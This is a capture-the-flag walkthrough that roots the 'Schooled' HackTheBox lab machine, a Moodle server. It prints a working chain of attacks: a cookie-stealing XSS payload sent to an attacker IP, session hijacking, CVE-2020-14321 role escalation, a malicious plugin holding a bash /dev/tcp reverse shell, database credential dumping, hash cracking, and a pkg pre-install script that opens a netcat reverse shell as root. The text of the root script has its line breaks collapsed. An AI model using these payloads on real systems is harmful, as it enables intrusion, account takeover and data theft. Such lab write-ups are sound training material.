Schooled HackTheBox WalkThrough

This is Schooled HackTheBox machine walkthrough. In this writeup I have demonstrated step-by-step how I rooted to Schooled HackTheBox machine. Before diving into the hacking part let us know something about this box. It is a FreeBSD OS machine with IP address 10.10.10.234 and difficulty level medium assigned by its maker.

So first of all, connect your Kali/Parrot machine with HackTheBox VPN and confirm your connectivity with this machine by pinging its IP 10.10.10.234. If all goes correct then start hacking. As usual I started by scanning the machine. Scanning gives us some idea how we have to proceed further like it helps to find open and closed ports and gives us information of different services running over them. I have used Nmap for this task and the result is given below: –

Scanning

$ sudo nmap -sC -sV -sT -oN nmap/Schooled.nmap 10.10.10.234

Nmap found ports 22 and 80 as open. OpenSSH on port 22 and Apache2 web server on port 80 are running. Since apache2 is running so we should have some website hosted over it which can be accessed at URL http://10.10.10.234. On visiting this URL found a subdomain schooled.htb.

And this page also contains some potential usernames. They are Manuel Phillips, Jane Higgins, Jamie Borham & Lianne Carter.

Before moving further let us add schooled.htb pointing to IP 10.10.10.234 to our hosts file. Hosts file is present in the directory /etc/.

Hosts file after modification 1

$ cat /etc/hosts

After some enumeration at http://schooled.htb when I didn’t get anything interesting then I performed virtual host bruteforce using GoBuster (directory and vhost bruteforcer).

Virtual Host Enumeration

$ gobuster vhost -u http://schooled.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

Virtual Host enumeration found moodle.schooled.htb. So let us add this host to our hosts file.

Hosts File After Modification 2

$ cat /etc/hosts

After going to URL http://moodle.schooled.htb/ found moodle LMS is used for designing this site. Moodle is a free and open-source learning management system written in PHP and distributed under the GNU General Public License. Since it is an open-source project therefore you can get its source code at its GitHub Repository.

When I tried to Create New Account with some unusual email like [email protected] it gave email format [email protected]. This has revealed a host name student.schooled.htb.

So let us add this host too to our hosts file.

Hosts File After Modification 3

$ cat /etc/hosts

So, I registered a new user with the following credentials.

Password: Test@1234

After creating account click on Continue to confirm the account.

Soon I logged in into this application my next step is to find its version number so that I can search for available vulnerabilities this version is affected with. But version is shown only to admin user and we are currently logged in as a normal user.

At URL http://moodle.schooled.htb/moodle/enrol/index.php?id=5 you will find enrol option in Mathematics subject. Click on enrol me button and enrol yourself in the mathematics subject. After some googling found that Course enrolments in moodle allowed privilege escalation from teacher role into manager role then to RCE, see CVE-2020-14321 for more info. To use CVE-2020-14321 exploit we have to first upgrade our account to teacher then teacher can perform privilege escalation to become manager.

But we are logged in as normal student so we can’t run above exploit. But wait, there is also an XSS vulnerability present in almost every version of moodle 3.7, 3.8 and 3.9 check this link for more info about this vulnerability. Since there is an XSS vulnerability so we can get teacher cookie using basic XSS payload document.cookie and send this cookie to our controlled web server, i.e., python web server. Currently logged in teachers are Manuel Phillips and Jamie Borham.

Finding XSS in MoodleNet Profile

Under Dashboard > My courses > Maths > General > Announcements > Reminder for joining student section at URL http://moodle.schooled.htb/moodle/mod/forum/discuss.php?d=5  got some hint about MoodleNet profile set.

After some more enumeration found MoodleNet profile inside the profile section of user Test (this user can be different in your case). The direct link to edit profile is http://moodle.schooled.htb/moodle/user/edit.php. After some fuzzing and spending sometimes on it found that MoodleNet profile field is vulnerable to XSS attack. Since user Phillips will access everyone’s profile therefore his cookie can be stolen by the following payload.

<img src=x onerror=this.src='http://10.10.14.56/?'+document.cookie;>

Simply go to edit.php page in above URL and Start Python3 HTTP Server on your local machine. And put above XSS payload in MoodleNet profile field and leave the remaining fields as it is and click on Update Profile to execute the payload.

You will found MoodleSeession value in your web server log as shown below. This session value will always change. So, in your case it will be different. MoodleSession=l5sdijpju0j4smee1nvssai8l4

$ sudo python3 -m http.server 80

Hijacking Phillips Account using Captured Session

Now open Inspector in web browser in the same tab in which you are logged in as normal user and replace the MoodleSession ID with the above ID you got into the GET request and refresh the page. Browser cookie before injecting MoodleSession ID.

Browser cookie after injecting MoodleSession ID got from GET request.

You will find that we have successfully hijacked user phillips account using XSS vulnerability. Now its time to follow CVE-2020-14321 to escalate the privilege to manager.

Escalating Privilege From Teacher to Manager

Lianne Carter is a Manager so we can escalate the privilege to get into her account. But before this we have to enrol her as a participant into the same course which phillips is teaching. For enrolling her go to Participants > Enrol users and click on Enrol users to enrol her as student and intercept the request in BurpSuite.

Simply change parameter userlist[] to 24 (because 24 is the ID of phillips) & roletoassign to 1 as shown below and Forward the request.

As you can see in the above screenshot Manual Philips is assigned role of manager and Teacher both. Now again enrol Lianne Carter as a student by sending valid request. We can see that both Lianne Carter and Manuel Phillips are registered as Manager.

Under Site Administration menu click on Login As and login as Lianne Carter.

Once you are logged in as user Lianne Carter go to URL http://moodle.schooled.htb/moodle/admin/roles/define.php. Click on Save changes button and intercept the request in Burpsuite.

Capture request in Burpsuite and follow this video for getting user shell. Link of this exploit is this.

Change the request as shown in the above video and forward it. Now go to http://moodle.schooled.htb/moodle/admin/tool/installaddon/index.php and install a vulnerable plugin. The plugin link is present at GitHub.

Click on continue to install the plugin.

Once plugin is installed click on the below link to confirm RCE. http://moodle.schooled.htb/blocks/rce/lang/en/block_rce.php?cmd=id

We have got RCE. Let us get user shell. To get user shell I have replaced content of block_rce.php with our reverse shell code. The code is

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.56/1234 0>&1'");?> // Don’t forget to change the IP with your tun0 IP

Getting User Shell

$ git clone https://github.com/HoangKien1020/Moodle_RCE

$ cd Moodle_RCE/

$ ls

$ unzip rce.zip

$ rm rce/lang/en/block_rce.php

$ vi rce/lang/en/block_rce.php

$ zip -r new_plugin.zip rce

$ ls

Now before uploading and Installing the plugin start netcat listener on your kali machine. Once you installed the plugin you will get reverse shell on your kali machine.

$ nc -nvlp 1234

$ whoami && id

After some enumeration found moodle config.php file inside the directory /usr/local/www/apache24/data/moodle/

$ cat /usr/local/www/apache24/data/moodle/config.php

This file contains database credentials and some other information. Useful information which can be extracted from above file are.

dbname : moodle

dbuser : moodle

dbpassword: PlaybookMaster2020

Let us login into MySQL account of user moodle and grab credential from the moodle database.

$ /usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -e 'show databases;'

$ /usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -e 'show tables from moodle;'

$ /usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -e 'use moodle;select username,password,email from mdl_user';

—Snip—

From above file we can get admin hash and from email ID it appears that admin is Jamie.

admin : $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW

Let us identify the hash and crack it to get admin password.

Identifying Hash

$2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW

The hash is bcrypt. Let us crack it using JohnTheRipper (an offline password cracker).

Cracking Hash

$ vi cred.hash

$ sudo john --format=bcrypt cred.hash --wordlist=/usr/share/wordlists/rockyou.txt

$ sudo john cred.hash --show

So, the cracked hash password is !QAZ2wsx. Let us login into Jamie account using SSH.

$ ssh 10.10.10.234 -l Jamie

~!QAZ2wsx

$ whoami && id

We are successfully logged in as user jamie. Let us grab user flag.

Capture User Flag

$ cat user.txt

Privilege Escalation

To escalate the privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation.

Finding PrivEsc Vector

$sudo -l command gave info about all special permissions given to user jamie. User jamie can run update command and can install any package on Schooled machine.

We will exploit its this special permission to get root shell. After some googling got this article which gives us info on how to create custom OpenBSD package. We can insert our reverse shell code in the custom package. When I created a custom package and tried to get shell using it I could easily escalate the privilege to root. So here our potential privilege escalation vector is privilege escalation by SUDO Right Exploitation.

Getting Root Shell

To get the root shell do the following.

1. Create a bash file root.sh with the following content.

#!/bin/shSTAGEDIR=/tmp/packagerm -rf ${STAGEDIR}mkdir -p ${STAGEDIR}cat >> ${STAGEDIR}/+PRE_INSTALL <<EOF# careful here, this may clobber your systemecho “Resetting root shell”rm /tmp/a;mkfifo /tmp/a;cat /tmp/a|/bin/sh -i 2>&1|nc 10.10.14.94 4321 >/tmp/a # Replace the IP with your tun0 IPEOFcat >> ${STAGEDIR}/+POST_INSTALL <<EOF# careful here, this may clobber your systemecho “Registering root shell”pw usermod -n root -s /bin/shEOFcat >> ${STAGEDIR}/+MANIFEST <<EOFname: mypackageversion: “1.0_5”origin: sysutils/mypackagecomment: “automates stuff”desc: “automates tasks which can also be undone later”maintainer: [email protected]: https://doe.itprefix: /EOFpkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -o .

2. Change the permission to executable.

3. Start netcat listener in another window.

4. Execute the shell.

On Schooled Machine

$ ls

$ chmod +x root.sh

$ ./root.sh

$ ls

$ sudo pkg install --no-repo-update *.txz

Proceed with this action? [y/N]: y

On Kali Machine

$ nc -nvlp 4321

# whoami && id

We are root now. Let us capture root flag.

Capture Root Flag

# cat /root/root.txt

This was how I rooted to Schooled HackTheBox machine. Hope you will learn something new from it. Thanks for reading this walkthrough. For any query and suggestion related to walkthrough feel free to write us at [email protected].